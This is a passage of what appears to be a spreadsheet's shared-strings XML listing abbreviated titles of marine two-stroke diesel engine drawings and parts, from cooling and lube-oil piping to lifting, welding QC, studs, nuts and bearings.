  <si>
    <t>SEAL.AIR PIPES-EXH.VALVE</t>
  </si>
  <si>
    <t>INSTRUCTION-SEALING AIR</t>
  </si>
  <si>
    <t>AIR SPRING PIPE-EXH.VALVE</t>
  </si>
  <si>
    <t>STARTING AIR DISTRIB.PIPE</t>
  </si>
  <si>
    <t>DIAGR.ARR.-START.AIR PIPE</t>
  </si>
  <si>
    <t>COMPRESSED AIR DIAGRAM</t>
  </si>
  <si>
    <t>BRANCH FOR STARTING AIR</t>
  </si>
  <si>
    <t>FRESH COOLING WATER PIPES</t>
  </si>
  <si>
    <t>SUNDRY PIPES-FRONT</t>
  </si>
  <si>
    <t>FW COOLING PIPES MAN TC</t>
  </si>
  <si>
    <t>FW COOLING PIPES ABB TC</t>
  </si>
  <si>
    <t>FW COOLING PIPES MET TC</t>
  </si>
  <si>
    <t>FW COOLING PIPES MAN-S TC</t>
  </si>
  <si>
    <t>FRESHWATER PIPE BRACING</t>
  </si>
  <si>
    <t>SUPPORT ON ENGINE</t>
  </si>
  <si>
    <t>AIR-COOL.CLEAN.PIPES,1 TC</t>
  </si>
  <si>
    <t>AIR-COOL.CLEAN.PIPES</t>
  </si>
  <si>
    <t>AIR-COOL.CLEAN.PIPES, 3TC</t>
  </si>
  <si>
    <t>CLEANING PIPES,TC (WATER)</t>
  </si>
  <si>
    <t>TC CLEAN.PIPE(DRY CLEAN.)</t>
  </si>
  <si>
    <t>HOLE-CLEANING PIPE AC</t>
  </si>
  <si>
    <t>MOUNT.OF WATER MIST CATC.</t>
  </si>
  <si>
    <t>SEA COOL. WATER PIPES</t>
  </si>
  <si>
    <t>SW COOLING PIPES, 1 TC</t>
  </si>
  <si>
    <t>SW COOLING PIPES, 2 TC</t>
  </si>
  <si>
    <t>CENTRAL COOLING HOT SYST.</t>
  </si>
  <si>
    <t>COOL.WATER SYSTEM DETAILS</t>
  </si>
  <si>
    <t>COOL.W.SYST.SW.MAIN+AUX.</t>
  </si>
  <si>
    <t>COOL.W.SYST.FW.MAIN+AUX.</t>
  </si>
  <si>
    <t>FRESHWATER SYST.PREHEATER</t>
  </si>
  <si>
    <t>CENTRAL COOL.W.,MAIN+AUX.</t>
  </si>
  <si>
    <t>PRESSURISED COOLING SYST.</t>
  </si>
  <si>
    <t>AIR COOLER CLEANING SYS.</t>
  </si>
  <si>
    <t>FRESHWATER SYST.TREATMENT</t>
  </si>
  <si>
    <t>DIAGR.ARR-COOL.WATER PIPE</t>
  </si>
  <si>
    <t>COOL.W. INLET AIR COOLER</t>
  </si>
  <si>
    <t>COOL.W.OUTLET LUB.O.COOL.</t>
  </si>
  <si>
    <t>SW. OUTLET FROM GENERATOR</t>
  </si>
  <si>
    <t>FRESHWATER DISTRIB. PIPE</t>
  </si>
  <si>
    <t>INLET CENTRIFUGAL PUMP</t>
  </si>
  <si>
    <t>OUTLET PREHEATER</t>
  </si>
  <si>
    <t>F.W.OUTLET COLLECT. PIPE</t>
  </si>
  <si>
    <t>F.W. OUTL.CH.AIR COOLER</t>
  </si>
  <si>
    <t>COOL. W. OUTLET COLL.PIPE</t>
  </si>
  <si>
    <t>OUTL.INTERM.PIPEINL. CH.</t>
  </si>
  <si>
    <t>NOZZLE COOLING WATER MODULE</t>
  </si>
  <si>
    <t>FW OUTL. ENGINE,INL. AMOT</t>
  </si>
  <si>
    <t>LUB.OIL SYSTEM PURIFIER</t>
  </si>
  <si>
    <t>LUB.OIL SYST.FILTER CLEAN</t>
  </si>
  <si>
    <t>LUB.OIL SYSTEM DETAILS</t>
  </si>
  <si>
    <t>CRANKCASE VENTILATION</t>
  </si>
  <si>
    <t>LUB.OIL SYST.CLEAN.INSTR.</t>
  </si>
  <si>
    <t>STUFF.B.DRAIN CLEAN.INSTR</t>
  </si>
  <si>
    <t>CLEAN SYSTEM STUFF.B.OIL</t>
  </si>
  <si>
    <t>ARR.LUB/COOL OIL DISTRIB</t>
  </si>
  <si>
    <t>LUB.OIL SYST.MAIN+AUX.</t>
  </si>
  <si>
    <t>CYLINDER LUB.OIL SYSTEM</t>
  </si>
  <si>
    <t>SCAV.AIR DRAIN SYSTEM</t>
  </si>
  <si>
    <t>POWER TURB.UNIT L.O.SYST.</t>
  </si>
  <si>
    <t>MAIN &amp; CAM LUB.OIL SYSTEM</t>
  </si>
  <si>
    <t>HYDR. CONTROL OIL SYSTEM</t>
  </si>
  <si>
    <t>GAS DIAGRAM</t>
  </si>
  <si>
    <t>LIST OF TOOLS</t>
  </si>
  <si>
    <t>CALCULATION BASIS, TOOLS</t>
  </si>
  <si>
    <t>LIFTING CON. ROD COMPLETE</t>
  </si>
  <si>
    <t>LIFTING OF CAMSHAFT</t>
  </si>
  <si>
    <t>LIFT.-TOP SECTION CENTRE</t>
  </si>
  <si>
    <t>CENTRE OF GRAVITY</t>
  </si>
  <si>
    <t>LIFTING OF FRAME COMPL.</t>
  </si>
  <si>
    <t>LIFT.BEDPL.EX.CRKSH.COMPL</t>
  </si>
  <si>
    <t>LIFT.BEDPL.EX.CRKSH.AFT.</t>
  </si>
  <si>
    <t>LIFT.-BEDPL.+CRKSH.COMPL.</t>
  </si>
  <si>
    <t>LIFTING OF RECEIVER COMPL</t>
  </si>
  <si>
    <t>LIFTING OF RECEIVER FORE</t>
  </si>
  <si>
    <t>LIFT.OF RECEIVER CENTRE</t>
  </si>
  <si>
    <t>LIFTING OF RECEIVER AFT</t>
  </si>
  <si>
    <t>LIFTING OF CHAINWH.FRAME</t>
  </si>
  <si>
    <t>SUPPORT FOR CRANKSHAFT</t>
  </si>
  <si>
    <t>ADJUSTM.OF GUIDE FORCEC.</t>
  </si>
  <si>
    <t>DISM.TOOL F.BEARINGSHELL</t>
  </si>
  <si>
    <t>MOUNTING OF TOOLS PANELS</t>
  </si>
  <si>
    <t>LUB.OIL BOTTOMTK 1 OUTLET</t>
  </si>
  <si>
    <t>LUB.OIL BOTTOMTK 4 OUTLET</t>
  </si>
  <si>
    <t>SPEC. LUB. OIL BOTT. TANK</t>
  </si>
  <si>
    <t>LUB.OIL BOTTOM TANK</t>
  </si>
  <si>
    <t>OIL LEVEL, TRIM AND LIST</t>
  </si>
  <si>
    <t>LAYOUT-FUEL OIL UNIT</t>
  </si>
  <si>
    <t>OUTLINE-FUEL OIL UNIT</t>
  </si>
  <si>
    <t>PIPE SYSTEM-FUEL OIL UNIT</t>
  </si>
  <si>
    <t>EL.DIAGRAM-FUEL OIL UNIT</t>
  </si>
  <si>
    <t>LAYOUT-CAMSHAFT L.O.UNIT</t>
  </si>
  <si>
    <t>OUTLINE-CAMSHAFT L.O.UNIT</t>
  </si>
  <si>
    <t>PIPE SYST.-CAMSH.L.O.UNIT</t>
  </si>
  <si>
    <t>OUTLINE-DRAIN TANK UNIT</t>
  </si>
  <si>
    <t>PIPE SYST.-DRAIN T.UNIT</t>
  </si>
  <si>
    <t>OUTLINE-FUEL OIL MIX.UNIT</t>
  </si>
  <si>
    <t>PIPE SYSTEM-F.O. MIX.UNIT</t>
  </si>
  <si>
    <t>PIPE SYSTEM-UNIFUEL</t>
  </si>
  <si>
    <t>PAINTING INSTRUCTIONS</t>
  </si>
  <si>
    <t>SOUNDING DIAGRAM</t>
  </si>
  <si>
    <t>PIPE-INLET CONTROL VALVE</t>
  </si>
  <si>
    <t>OUTLINE-CLEANING UNIT</t>
  </si>
  <si>
    <t>PIPE SYSTEM,EMULSION UNIT</t>
  </si>
  <si>
    <t>ARR.F.W. COOLING UNIT</t>
  </si>
  <si>
    <t>PIPE SYSTEM,F.W.COOL.UNIT</t>
  </si>
  <si>
    <t>ARR. WASTE HEAT RECOVERY</t>
  </si>
  <si>
    <t>FRICTION-MATERIALS</t>
  </si>
  <si>
    <t>LINK ASSEMBLY</t>
  </si>
  <si>
    <t>FORK ASSEMBLY</t>
  </si>
  <si>
    <t>TOP BRACING FORCES</t>
  </si>
  <si>
    <t>TOP BRACING TENSION DATA</t>
  </si>
  <si>
    <t>TOP BRACING INSTRUCTIONS</t>
  </si>
  <si>
    <t>VIBRATION LIMITS</t>
  </si>
  <si>
    <t>STATIC CRANKSHAFT LOAD</t>
  </si>
  <si>
    <t>HYDR.TOP BRACING INSTRUC.</t>
  </si>
  <si>
    <t>HYDR.TOP DAMPER INSTRUC.</t>
  </si>
  <si>
    <t>MIN.REQ.SPACE FOR ENGINE</t>
  </si>
  <si>
    <t>ENG.ROOM HEIGHT JIB CRANE</t>
  </si>
  <si>
    <t>ENG.ROOM HEIGHT NORM.CRAN</t>
  </si>
  <si>
    <t>MAN B&amp;W DOUBLE JIB CRANE</t>
  </si>
  <si>
    <t>ENG.ROOM CRANE CAPACITY</t>
  </si>
  <si>
    <t>EQUIPMENT FOR OVERHAUL</t>
  </si>
  <si>
    <t>OVERHAULING AUX.MACHINERY</t>
  </si>
  <si>
    <t>OVERHAULING 2-STROKE ENG.</t>
  </si>
  <si>
    <t>ENG.ARR.UNKNOWN SHIP 2-ST</t>
  </si>
  <si>
    <t>ENG.ARR.TANKER 2-STROKE</t>
  </si>
  <si>
    <t>ENG.ARR.BULK CARR.2-ST.</t>
  </si>
  <si>
    <t>ENG.ARR.CONTAINER 2-ST.</t>
  </si>
  <si>
    <t>ENG.ARR.RO-RO 2-STROKE</t>
  </si>
  <si>
    <t>ENG.ARR.FERRY 2-STROKE</t>
  </si>
  <si>
    <t>ENG.ARR.FERRY 4-STROKE</t>
  </si>
  <si>
    <t>ENG.ARR.OTHER SHIP 4-ST.</t>
  </si>
  <si>
    <t>LAYOUT-UNIFUEL</t>
  </si>
  <si>
    <t>OVERHAUL.TOOLS-CRANE ETC.</t>
  </si>
  <si>
    <t>EL.PROD. AUX MACH., PTO</t>
  </si>
  <si>
    <t>AUX.MACHINERY OTHER</t>
  </si>
  <si>
    <t>TCS/PTI + PTO/PTI</t>
  </si>
  <si>
    <t>SILENCER+EXH.SYST.(NOISE)</t>
  </si>
  <si>
    <t>CRANE BEAM FOR T/C</t>
  </si>
  <si>
    <t>ENGINE BHP CHOICE</t>
  </si>
  <si>
    <t>DIMENSION+WEIGHT INVESTIG</t>
  </si>
  <si>
    <t>ECONOMY INVESTIGATIONS</t>
  </si>
  <si>
    <t>COMPARISON STEAM/DIESEL</t>
  </si>
  <si>
    <t>COMPARISON DIESEL/DIESEL</t>
  </si>
  <si>
    <t>LOAD DIAGRAM</t>
  </si>
  <si>
    <t>MODEL WORK</t>
  </si>
  <si>
    <t>UNITIZATION INVESTIGATION</t>
  </si>
  <si>
    <t>SCR CATALYTIC REACTOR</t>
  </si>
  <si>
    <t>PROFILE OF ENGINE SEATING</t>
  </si>
  <si>
    <t>VARIOUS ENGINE SEATINGS</t>
  </si>
  <si>
    <t>INSTALL. OF SUPP. WEDGE</t>
  </si>
  <si>
    <t>ARR.OF HOLDING-DOWN BOLTS</t>
  </si>
  <si>
    <t>MACH.OF TOPPLATE F.CHOCKS</t>
  </si>
  <si>
    <t>DATA FOR SHAFT ALIGNMENT</t>
  </si>
  <si>
    <t>LINER F.SIDE CHOCK,PORT</t>
  </si>
  <si>
    <t>SUPPORTING CHOCK</t>
  </si>
  <si>
    <t>SECURING SUPPORTINGCHOCKS</t>
  </si>
  <si>
    <t>PS FOR PISTON</t>
  </si>
  <si>
    <t>PS FOR STARTING VALVE</t>
  </si>
  <si>
    <t>GRINDING-OFF DEFECTS</t>
  </si>
  <si>
    <t>PR RECIP. PARTS, MC-S</t>
  </si>
  <si>
    <t>QC FIRST TIME APPROV.GEN.</t>
  </si>
  <si>
    <t>GENERAL CLASS REQUIREMENT</t>
  </si>
  <si>
    <t>B+W REQUIREMENTS</t>
  </si>
  <si>
    <t>QI-S WELDING INSTRUCTIONS</t>
  </si>
  <si>
    <t>WELDING FOR TURBOCHARGER</t>
  </si>
  <si>
    <t>PR HYDR.EXH.ACTUATOR</t>
  </si>
  <si>
    <t>ULTRASONIC TEST</t>
  </si>
  <si>
    <t>PR COOLING JACK.THIN WALL</t>
  </si>
  <si>
    <t>QC AIR COOLER</t>
  </si>
  <si>
    <t>QC EXHAUST RECEIVER,WELD.</t>
  </si>
  <si>
    <t>C.P. CONVERSION PROCEDURE</t>
  </si>
  <si>
    <t>SA FOR FRAME BOX</t>
  </si>
  <si>
    <t>EXHAUST CHARG.AIR COOLER</t>
  </si>
  <si>
    <t>SA FOR FUEL PUMP GEAR</t>
  </si>
  <si>
    <t>SA FOR FUEL PUMP</t>
  </si>
  <si>
    <t>QS CONNECTING ROD</t>
  </si>
  <si>
    <t>RECIP.PARTS ACC.CRITERIA</t>
  </si>
  <si>
    <t>QC BEAR.SUPP.FIRST TIME</t>
  </si>
  <si>
    <t>QC CYL.COVER FIRST TIME</t>
  </si>
  <si>
    <t>ALIGN CROSSHEAD GUIDES</t>
  </si>
  <si>
    <t>MOUNT LONG STAY BOLTS</t>
  </si>
  <si>
    <t>ASS.OF CHAIN - FORE END</t>
  </si>
  <si>
    <t>MOUNT EXH.GAS RECEIVER</t>
  </si>
  <si>
    <t>DISMANTLE FRAME SECTION</t>
  </si>
  <si>
    <t>TEST OIL AND WATER</t>
  </si>
  <si>
    <t>TEST RUNNING</t>
  </si>
  <si>
    <t>DISPATCH PATTERN CLASS A</t>
  </si>
  <si>
    <t>DISPATCH PATTERN CLASS B</t>
  </si>
  <si>
    <t>TECH.DATA, AIR COOLER</t>
  </si>
  <si>
    <t>TURBOCHARGER-OUTLINE</t>
  </si>
  <si>
    <t>BALANCING DRAWING-ROTOR</t>
  </si>
  <si>
    <t>ARR.OF PICK-UP</t>
  </si>
  <si>
    <t>PROJECT ARRANGEMENT</t>
  </si>
  <si>
    <t>QC GEN.RULES CLASS.SOC.</t>
  </si>
  <si>
    <t>REPAIR GRAY CASTINGS</t>
  </si>
  <si>
    <t>QC NDT OF KP PISTON SKIRT</t>
  </si>
  <si>
    <t>QC DIGITCODE DISCONT.FORG</t>
  </si>
  <si>
    <t>DETERM.MICROSTR.CAST IRON</t>
  </si>
  <si>
    <t>SEP.CAST.TENSILET:SPECIM.</t>
  </si>
  <si>
    <t>QC OVERL.ADH.TEST CROSSH.</t>
  </si>
  <si>
    <t>QC CYLINDER LINERS</t>
  </si>
  <si>
    <t>QS WELD CRANKSH.MC,S34MNV</t>
  </si>
  <si>
    <t>QC WELD CRANKSH OF THROWS</t>
  </si>
  <si>
    <t>INSP.L55 WELDED CRANKSH.</t>
  </si>
  <si>
    <t>QC FORGED CRANKSHAFT</t>
  </si>
  <si>
    <t>QC CENTRIF.CAST CYL.LINER</t>
  </si>
  <si>
    <t>QC CAST CYLINDER LINERS</t>
  </si>
  <si>
    <t>QC CYL LINER FIRST TIME</t>
  </si>
  <si>
    <t>QC FORGED CROSSHEAD</t>
  </si>
  <si>
    <t>QC FLAME-HARDN.PISTON ROD</t>
  </si>
  <si>
    <t>PR CRANKSHAFT RECTIFYING</t>
  </si>
  <si>
    <t>RP CRANK THROW REPLACEM.</t>
  </si>
  <si>
    <t>PS CRANK THROW SHOT BLAST</t>
  </si>
  <si>
    <t>QC WHITE METAL FIRST TIME</t>
  </si>
  <si>
    <t>PR INSTAL. TAPERED BOLTS</t>
  </si>
  <si>
    <t>PR FLAMEHARDN.PISTON ROD</t>
  </si>
  <si>
    <t>FLAME HARDEN. PISTON ROD</t>
  </si>
  <si>
    <t>PS WELD CRANKSH.MC,S34MNV</t>
  </si>
  <si>
    <t>WELD.CRANKSH.MC,S20MO</t>
  </si>
  <si>
    <t>WELD.P.S.CRANKSH.L55.S36S</t>
  </si>
  <si>
    <t>WELDED CRANKSH.REPAIR-MAW</t>
  </si>
  <si>
    <t>WELDED CRANKSH.REPAIR-SAW</t>
  </si>
  <si>
    <t>WELD CLADD. LGB PISTON CR</t>
  </si>
  <si>
    <t>FRAMEBOX INT.WELD.F+P TOL</t>
  </si>
  <si>
    <t>FRAMEBOX FOR.WELD.F+P TOL</t>
  </si>
  <si>
    <t>FRAMEBOX AFT.WELD.F+P TOL</t>
  </si>
  <si>
    <t>BEDPLATE WELDING F+P TOL.</t>
  </si>
  <si>
    <t>BEDPLATE INT.WELD.F+P TOL</t>
  </si>
  <si>
    <t>BEDPLATE FOR.WELD.F+P TOL</t>
  </si>
  <si>
    <t>BEDPLATE AFT.WELD.F+P TOL</t>
  </si>
  <si>
    <t>INSP.REP.MAGN.P.CRANKJOUR</t>
  </si>
  <si>
    <t>DIM.INSPECTION OF BLANKS</t>
  </si>
  <si>
    <t>DIM.INSP.OF FINISHEDITEM</t>
  </si>
  <si>
    <t>TECH.SPECIFICATION</t>
  </si>
  <si>
    <t>STD.TENSILE SPECIM. STEEL</t>
  </si>
  <si>
    <t>PR CABLING &amp; CONNECTIONS</t>
  </si>
  <si>
    <t>REQ.APP.WORKSH.WELD.CRANK</t>
  </si>
  <si>
    <t>PIPE CONNECTIONS</t>
  </si>
  <si>
    <t>DRAWING GUIDE</t>
  </si>
  <si>
    <t>FOUNDATION DRAW. 4L35MC-S</t>
  </si>
  <si>
    <t>FOUNDATION DRAWING   MC-S</t>
  </si>
  <si>
    <t>ENGINE/GENERATOR LAYOUT</t>
  </si>
  <si>
    <t>STATION LAYOUT</t>
  </si>
  <si>
    <t>SCR LAYOUT</t>
  </si>
  <si>
    <t>SCR SYSTEM LAYOUT</t>
  </si>
  <si>
    <t>LUB.OIL OUTLET,MC-S ENG.</t>
  </si>
  <si>
    <t>AIR INTAKE QUALITY</t>
  </si>
  <si>
    <t>LUBES, FUELS, AIR SUPPLY</t>
  </si>
  <si>
    <t>AUX.EQUIPMENT F. STAND-BY</t>
  </si>
  <si>
    <t>GLUES</t>
  </si>
  <si>
    <t>ALIGNMENT, ST.AIR DISTRIB</t>
  </si>
  <si>
    <t>LIST OF ST. AIR DISTRIB.</t>
  </si>
  <si>
    <t>FIRE EXTINGUISHING-POWDER</t>
  </si>
  <si>
    <t>DIAGRAM FOR PIPE ARR.</t>
  </si>
  <si>
    <t>ADJUSTM.OF FUEL OIL PRES.</t>
  </si>
  <si>
    <t>PARTS ON ENGINE</t>
  </si>
  <si>
    <t>X-RAY EXAMINING ARR.</t>
  </si>
  <si>
    <t>FIRE EXT. -SCAV.AIR SPACE</t>
  </si>
  <si>
    <t>ALTERATION-SUNDRY PIPES</t>
  </si>
  <si>
    <t>LIST OF BALL VALVES</t>
  </si>
  <si>
    <t>FUEL OIL PIPES, HEATING</t>
  </si>
  <si>
    <t>LIST OF THREE-WAY COCK</t>
  </si>
  <si>
    <t>LIST OF ARRANGEMENT</t>
  </si>
  <si>
    <t>F.O.RETURN PIPE-UNCOOL.V.</t>
  </si>
  <si>
    <t>LIST OF WRENCHES</t>
  </si>
  <si>
    <t>LIST OF STRAIGHT COCK</t>
  </si>
  <si>
    <t>LIST OF COMPENSATORS</t>
  </si>
  <si>
    <t>LIST OF NON RETURN VALVES</t>
  </si>
  <si>
    <t>LIST OF GAUGE CONNECT.</t>
  </si>
  <si>
    <t>PIPING ARR.DETAILS</t>
  </si>
  <si>
    <t>BREATHING  FILTER</t>
  </si>
  <si>
    <t>ELBOWS</t>
  </si>
  <si>
    <t>SUPPORT FOR AMOT</t>
  </si>
  <si>
    <t>WIRE FITTING</t>
  </si>
  <si>
    <t>SHAFT, WITH TOOL END</t>
  </si>
  <si>
    <t>SHAFT, MEAS.INSTR.AX.VIBR</t>
  </si>
  <si>
    <t>DOWEL PIN-CYLINDRICAL</t>
  </si>
  <si>
    <t>DOWEL PIN-CYL.SPECIAL</t>
  </si>
  <si>
    <t>PIN WITH SLOT</t>
  </si>
  <si>
    <t>SPRING PIN</t>
  </si>
  <si>
    <t>DOWEL PIN-CYL.WITH EYE</t>
  </si>
  <si>
    <t>VALVES, LIST</t>
  </si>
  <si>
    <t>CLAW COUPLING, PARTS FOR</t>
  </si>
  <si>
    <t>FRICTION COUPLING,PART</t>
  </si>
  <si>
    <t>SLEEVE COUPLING,PARTS FOR</t>
  </si>
  <si>
    <t>FLEXIBLE COUPLING,PARTS F</t>
  </si>
  <si>
    <t>FLANGE COUPLING,PARTS FOR</t>
  </si>
  <si>
    <t>PART FOR COUPLING</t>
  </si>
  <si>
    <t>HINGED JOINT</t>
  </si>
  <si>
    <t>CLAMPING ARM, SINGLE</t>
  </si>
  <si>
    <t>SINGLE LEVER</t>
  </si>
  <si>
    <t>SINGLE LEVER-FORKED</t>
  </si>
  <si>
    <t>LEVER-SUNDRY TYPES</t>
  </si>
  <si>
    <t>DOUBLE ARMS</t>
  </si>
  <si>
    <t>HANDLE FOR WELDING</t>
  </si>
  <si>
    <t>HANDLE-SUNDRY TYPES</t>
  </si>
  <si>
    <t>TOMMY BAR, PIN</t>
  </si>
  <si>
    <t>BALL, FOR HANDLE</t>
  </si>
  <si>
    <t>GEARWHEEL-CYLINDRICAL</t>
  </si>
  <si>
    <t>TOOTH BELT DISC</t>
  </si>
  <si>
    <t>CHAIN LINK-OUTER</t>
  </si>
  <si>
    <t>CHAIN LINK-INTERMEDIATE</t>
  </si>
  <si>
    <t>PIN FOR CHAIN</t>
  </si>
  <si>
    <t>CHAIN TAB</t>
  </si>
  <si>
    <t>PEAR SHAPED RING</t>
  </si>
  <si>
    <t>CHAIN LINK</t>
  </si>
  <si>
    <t>SUNDRY CHAINS AND LINKS</t>
  </si>
  <si>
    <t>KEY RING</t>
  </si>
  <si>
    <t>V BELT</t>
  </si>
  <si>
    <t>TOOTH BELT</t>
  </si>
  <si>
    <t>ROUND CLAMP-WIRE ROPE END</t>
  </si>
  <si>
    <t>HEART-SHAPED THIMBLE</t>
  </si>
  <si>
    <t>WIRE LOCK</t>
  </si>
  <si>
    <t>SPRING, COMPR. RIGHT-HAND</t>
  </si>
  <si>
    <t>SPRING, COMPR. LEFT-HAND</t>
  </si>
  <si>
    <t>SPRING, COMPR. RECT.SECT.</t>
  </si>
  <si>
    <t>SPRING, EXTENSION</t>
  </si>
  <si>
    <t>SPRING CLAMP</t>
  </si>
  <si>
    <t>FITTED BOLT, CHEESE HEAD</t>
  </si>
  <si>
    <t>FITTED BOLT, HEXAGON HEAD</t>
  </si>
  <si>
    <t>FITTED BOLT, SOCKET HEAD</t>
  </si>
  <si>
    <t>SCREW, HEXAGON HEAD</t>
  </si>
  <si>
    <t>SCREW, HEXAGON W. FLANGE</t>
  </si>
  <si>
    <t>HOLLOW POINTED SCREW</t>
  </si>
  <si>
    <t>THRUST+SET+POINTED SCREW</t>
  </si>
  <si>
    <t>SCREW-SPECIAL THREAD</t>
  </si>
  <si>
    <t>UNION NUT AND PLUG SCREW</t>
  </si>
  <si>
    <t>SCREW-SPECIAL HEAD</t>
  </si>
  <si>
    <t>UNION NUT AND PLUG</t>
  </si>
  <si>
    <t>SCREW-CHEESE HEAD</t>
  </si>
  <si>
    <t>SCREW WITH SLOT</t>
  </si>
  <si>
    <t>HEXAGON SOCKET SCREWS</t>
  </si>
  <si>
    <t>SCREW-SELF TAPPING W.SLOT</t>
  </si>
  <si>
    <t>SCREW-SELF TAPP.W.HEXAGON</t>
  </si>
  <si>
    <t>SCREW-PAN HEAD</t>
  </si>
  <si>
    <t>HEXAGON OR SQUARE SOCKET</t>
  </si>
  <si>
    <t>SCREW, WING</t>
  </si>
  <si>
    <t>THUMB SCREW</t>
  </si>
  <si>
    <t>POINTED SCREW</t>
  </si>
  <si>
    <t>CORE PLUG</t>
  </si>
  <si>
    <t>UNION SCREW</t>
  </si>
  <si>
    <t>STUD, THREAD BOTH ENDS WG</t>
  </si>
  <si>
    <t>STUD, REDUCED SHANK</t>
  </si>
  <si>
    <t>STUD, THREAD NOT SAME</t>
  </si>
  <si>
    <t>STUD WITH 3 THREADS</t>
  </si>
  <si>
    <t>STUD, THREAD BOTH ENDS</t>
  </si>
  <si>
    <t>STUD, LONG/SHORT THREAD</t>
  </si>
  <si>
    <t>STUD, WITH TOOL HEXAGON</t>
  </si>
  <si>
    <t>EXTENSION STUD F. HYDRAUL</t>
  </si>
  <si>
    <t>STUD, THREAD ONE END</t>
  </si>
  <si>
    <t>COLLAR PIN WITH THREAD</t>
  </si>
  <si>
    <t>COLLAR PIN WITHOUT THREAD</t>
  </si>
  <si>
    <t>STUD, THREAD ALL OVER</t>
  </si>
  <si>
    <t>STUD, WITH RING GROOVE</t>
  </si>
  <si>
    <t>STUD, THREAD BOTH END</t>
  </si>
  <si>
    <t>SPECIAL STUDS</t>
  </si>
  <si>
    <t>WASHER FACED HEXAGON NUT</t>
  </si>
  <si>
    <t>NUT, HEXAGON CASTLE</t>
  </si>
  <si>
    <t>NUT, HEXAGON CAP</t>
  </si>
  <si>
    <t>NUT, HEXAGON WITH COLLAR</t>
  </si>
  <si>
    <t>NUT, SPHERICAL</t>
  </si>
  <si>
    <t>NUT, HEXAGON UNION</t>
  </si>
  <si>
    <t>NUT, HEXAGON SELF-LOCKING</t>
  </si>
  <si>
    <t>NUT, HEXAGON SPECIAL</t>
  </si>
  <si>
    <t>NUT, ROUND</t>
  </si>
  <si>
    <t>NUT, ROUND WITH COLLAR</t>
  </si>
  <si>
    <t>NUT, ROUND W LOCKING RING</t>
  </si>
  <si>
    <t>NUT, ROUND CAP</t>
  </si>
  <si>
    <t>NUT, ROUND F HOOK-WRENCH</t>
  </si>
  <si>
    <t>NUT, ROUND SPECIAL</t>
  </si>
  <si>
    <t>NUT, TUBULAR</t>
  </si>
  <si>
    <t>WING NUT</t>
  </si>
  <si>
    <t>THUMB NUT</t>
  </si>
  <si>
    <t>NUT, SQUARE</t>
  </si>
  <si>
    <t>EYE NUT</t>
  </si>
  <si>
    <t>NUT, SPECIAL</t>
  </si>
  <si>
    <t>SLEEVE-OUTSIDE TAPERED</t>
  </si>
  <si>
    <t>SLEEVE-CYL.WITH COLLAR</t>
  </si>
  <si>
    <t>BUSHING, CLAMPING</t>
  </si>
  <si>
    <t>SLEEVE-CYL.SMOOTH</t>
  </si>
  <si>
    <t>SLEEVE-OUTSIDE EDGED</t>
  </si>
  <si>
    <t>SLEEVE-RESILIENT(RUBBER)</t>
  </si>
  <si>
    <t>SLEEVE-SPECIAL</t>
  </si>
  <si>
    <t>SLEEVE-SELF-LUBRICATING</t>
  </si>
  <si>
    <t>SLEEVE-SELF-LUB. W COLLAR</t>
  </si>
  <si>
    <t>SLEEVE-SELF-LUB NON-METAL</t>
  </si>
  <si>
    <t>DISC, ROUND-CHAMFERED</t>
  </si>
  <si>
    <t>DISC WITH OUTSIDE RECESS</t>
  </si>
  <si>
    <t>DISC WITH INSIDE RECESS</t>
  </si>
  <si>
    <t>DISC WITH INCISION</t>
  </si>
  <si>
    <t>DISC WITH RECESSES</t>
  </si>
  <si>
    <t>DISC SPECIAL</t>
  </si>
  <si>
    <t>SPACER TUBULAR, STRAIGHT</t>
  </si>
  <si>
    <t>SPACER TUBULAR,SOCKET-END</t>
  </si>
  <si>
    <t>DISC,PLAIN-EDGED</t>
  </si>
  <si>
    <t>TEST INFO 5</t>
  </si>
  <si>
    <t>DISC-EDGED WITH RECESS</t>
  </si>
  <si>
    <t>DISC EDGED WITH INCISION</t>
  </si>
  <si>
    <t>LOCKING PLATE-SPECIAL</t>
  </si>
  <si>
    <t>DISC-EDGED WITH HOLES</t>
  </si>
  <si>
    <t>DISC-EDGED WITH HOLE</t>
  </si>
  <si>
    <t>PLATE-ROUND-MACHINED</t>
  </si>
  <si>
    <t>PLATE-ANGULAR-MACHINED</t>
  </si>
  <si>
    <t>TAB WASHER WITH X TABS</t>
  </si>
  <si>
    <t>LOCKING PLATE-RECTANGULAR</t>
  </si>
  <si>
    <t>LOCKING PLATE-CIRCULAR</t>
  </si>
  <si>
    <t>RETAINING RING,SHAFT/BORI</t>
  </si>
  <si>
    <t>LOCKING WASHER, TOOTHED</t>
  </si>
  <si>
    <t>SPRING LOCK</t>
  </si>
  <si>
    <t>LOCKING DEVICE, SPECIAL</t>
  </si>
  <si>
    <t>DISTANCE BLOCK</t>
  </si>
  <si>
    <t>TENSION CLEAT</t>
  </si>
  <si>
    <t>MACH.WOOD-ROUND DISC</t>
  </si>
  <si>
    <t>MACH.WOOD-SQUARE DISC</t>
  </si>
  <si>
    <t>MACH.WOOD-ANGULAR DISC</t>
  </si>
  <si>
    <t>PIPE CLAMP-2 FLAPS</t>
  </si>
  <si>
    <t>PIPE CLAMP, 1 FLAP</t>
  </si>
  <si>
    <t>PIPE CLAMP WITHOUT FLAPS</t>
  </si>
  <si>
    <t>CLAMPS, SPECIAL</t>
  </si>
  <si>
    <t>CLAMP MADE OF PIPE</t>
  </si>
  <si>
    <t>CLAMP-SECTIONAL MATERIAL</t>
  </si>
  <si>
    <t>CLAMPS-SPECIAL</t>
  </si>
  <si>
    <t>CLAMP (TWO PARTS)</t>
  </si>
  <si>
    <t>MAGNET-CYLINDRICAL</t>
  </si>
  <si>
    <t>MAGNET-RECTANGULAR</t>
  </si>
  <si>
    <t>RIVET, ROUND HEAD</t>
  </si>
  <si>
    <t>RIVET, COUNTERSUNK HEAD</t>
  </si>
  <si>
    <t>RIVET, BLIND</t>
  </si>
  <si>
    <t>PARALLEL KEY-SLIDING FIT</t>
  </si>
  <si>
    <t>PARALLEL KEY-PRESS FIT</t>
  </si>
  <si>
    <t>GIB-HEAD TAPER KEY</t>
  </si>
  <si>
    <t>HOOK WITH THREAD</t>
  </si>
  <si>
    <t>HOOK WITH 2 EYES</t>
  </si>
  <si>
    <t>FINAL LINK</t>
  </si>
  <si>
    <t>DOOR FASTENER</t>
  </si>
  <si>
    <t>LOCKING BLOCK</t>
  </si>
  <si>
    <t>BEARING UPPER PART</t>
  </si>
  <si>
    <t>BEARING LOWER PART</t>
  </si>
  <si>
    <t>SLIDING BEARING</t>
  </si>
  <si>
    <t>SLIDE BEARING HOUSING</t>
  </si>
  <si>
    <t>BEARING, PARTS</t>
  </si>
